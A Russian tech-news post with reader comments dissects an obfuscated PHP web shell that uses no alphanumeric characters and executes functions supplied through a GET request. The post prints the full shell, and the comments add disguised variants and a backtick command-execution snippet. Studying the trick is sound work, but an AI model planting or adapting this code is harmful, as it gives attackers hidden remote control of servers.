PHP-шелл без единого буквенно-цифрового символа

    Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
    @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
    $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
    $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
    $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
    $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
    $_=$ 
    $_[$__+ $__] ;$_[@-_]($_[@!+_] );
    

    Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.

    Один из программистов Sucuri Йорман Ариас (Yorman Arias) расположил код в более удобочитаемом виде и облёк каждую строку кода в var_dump(), чтобы увидеть её вывод:

    image

    В итоге, используя туманные фразы вроде «some boolean magic » и анализируя код, приходит к выводу, что предназначение вредоноса — выполнение PHP-функций, который передаются ему при помощи GET-запроса.

    Технические подробности — здесь.
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама
    Комментарии 33
    • +58
      В источнике не менее интересный скрипт на JS в комментах.

      ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
      • +49
        Ух ты, сколько смайлов.
        • +18
          Это для отвода глаз. Пока этот скрипт улыбается творятся жуткие вещи.
          • +7
            По-моему, это: "(゚ー゚)+=(゚Θ゚)" — Винни Пух и Пятачок.
            • –5
              А по результату Винни имеет Пятачка )))
              • 0
                А мне кажется — тот, что слева, держит пистолет, направленный на того, что справа. Это объясняет самодовольную ухмылку у того, что слева, и испуганный вид того, что справа.
        • +5
          а еще давненько на хабре рассматривали скрипт, который обфусцирован до пробелов.
          • 0
            Найдете линк?
            • +15
              http://habrahabr.ru/post/112530/
              В самом конце.
              + там еще есть метод создания png c js кодом, извлечение и запись.
              • 0
                Ох люблю я эти вещи!
                Спасибо!
                • 0
                  Да чего там любить-то? По факту это же не JS, он же не выполнится в браузере.
          • +2
            Знакомый вывод. Скорее всего вот источник.
          • Вау. Это супер. Интересно что он делает…
            • Интересно что он делает. Нашел в соседнем коменте что делает. Отлично зашифровали. Жаль не успел отредактировать комент.
            • 0
              Боюсь предсказать, что он делает, а уж тем более запускать.

              Так что он делает?

              Уже посмотрел.
            • +3
              Вызов принят
              • 0
                может register_globals включить? и в get добавить параметр _=<значение>
                • 0
                  такой шелл уже так легко не забросишь на чужой хостинг, т.к. везде register_globals выключен.
                  а этот шелл будет работать на любом обычном хостинге.
                  • НЛО прилетело и опубликовало эту надпись здесь
                    • 0
                      А вот это уже далеко не любой хостинг ;)
                      • +2
                        Что значит «правильно»? Отключение стандартных функций языка не может быть правильным. Оно может быть костылем, исправляющим ошибку в другом месте, но не правильным.
                  • –15
                    Няшка Няшка Няшка
                    © Sheldon Lee Cooper
                    • –19
                      Но все-равно php — ни разу не perl, говорите…
                      Python — рулит.
                      • +3
                        Ну да, ну да. Расшифровайте: http://bolknote.ru/2008/09/07/~1842/
                        • –1
                          если я ничего не перепутал, то возвращается строка «Писать на Перле можно на любом языке программирования»
                      • +4
                        Похожая штука на JS: www.jsfuck.com/
                        • 0
                          То ли из-за особенностей блогодвижка, то ли из-за недосмотра, то ли из-за неправильной настройки PHP то ли автор оригинального исследования, то ли автор скрипта (вряд ли)… Короче, кто-то пропустил один символ, и теперь этот код бросает Notice, что, как говорится, палевно.
                          • 0
                            =@`$c`

                            Правда register_globals нужен
                            • НЛО прилетело и опубликовало эту надпись здесь
                              • +1
                                Такой вариант интереснее смотрится.
                                @$̓[]=@!+_; $͘=@${_}>>$̓;$̓[]=$͘;$̓[]=@_;$̓[((++$͘)+($͘++ ))].=$̓;
                                $̓[]=++$͘; $̓[]=$̓[--$͘][$͘>>$͘];$̓[$͘].=(($͘+$͘)+ $̓[$͘-$͘]).($͘+$͘+$͘)+$̓[$͘-$͘];
                                $̓[$͘+$͘] =($̓[$͘][$͘>>$͘]).($̓[$͘][$͘]^$̓[$͘][($͘<<$͘)-$͘] );
                                $̓[$͘+$͘] .=($̓[$͘][($͘<<$͘)-($͘/$͘)])^($̓[$͘][$͘] );
                                $̓[$͘+$͘] .=($̓[$͘][$͘+$͘])^$̓[$͘][($͘<<$͘)-$͘ ];
                                $̓=$
                                $̓[$͘+ $͘] ;$̓[@-_]($̓[@!+_] );
                                
                                • +7
                                  А так веселее
                                  @$ˊ͜ˋ[]=@!+_; $˶͜˵=@${_}>>$ˊ͜ˋ;$ˊ͜ˋ[]=$˶͜˵;$ˊ͜ˋ[]=@_;$ˊ͜ˋ[((++$˶͜˵)+($˶͜˵++ ))].=$ˊ͜ˋ;
                                  $ˊ͜ˋ[]=++$˶͜˵; $ˊ͜ˋ[]=$ˊ͜ˋ[--$˶͜˵][$˶͜˵>>$˶͜˵];$ˊ͜ˋ[$˶͜˵].=(($˶͜˵+$˶͜˵)+ $ˊ͜ˋ[$˶͜˵-$˶͜˵]).($˶͜˵+$˶͜˵+$˶͜˵)+$ˊ͜ˋ[$˶͜˵-$˶͜˵];
                                  $ˊ͜ˋ[$˶͜˵+$˶͜˵] =($ˊ͜ˋ[$˶͜˵][$˶͜˵>>$˶͜˵]).($ˊ͜ˋ[$˶͜˵][$˶͜˵]^$ˊ͜ˋ[$˶͜˵][($˶͜˵<<$˶͜˵)-$˶͜˵] );
                                  $ˊ͜ˋ[$˶͜˵+$˶͜˵] .=($ˊ͜ˋ[$˶͜˵][($˶͜˵<<$˶͜˵)-($˶͜˵/$˶͜˵)])^($ˊ͜ˋ[$˶͜˵][$˶͜˵] );
                                  $ˊ͜ˋ[$˶͜˵+$˶͜˵] .=($ˊ͜ˋ[$˶͜˵][$˶͜˵+$˶͜˵])^$ˊ͜ˋ[$˶͜˵][($˶͜˵<<$˶͜˵)-$˶͜˵ ];
                                  $ˊ͜ˋ=$
                                  $ˊ͜ˋ[$˶͜˵+ $˶͜˵] ;$ˊ͜ˋ[@-_]($ˊ͜ˋ[@!+_] );
                                  
                                • 0
                                  А для Perl даже есть модуль специальны, чтобы так делать: Acme::EyeDrops

                                  А вообще-то, сейчас брейнфак и подобные языки очень сильно уступают Chicken

                                  Подробную презентацию языка, которая будет понятна даже без знания английского, можно посмотреть тут:

                                  Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.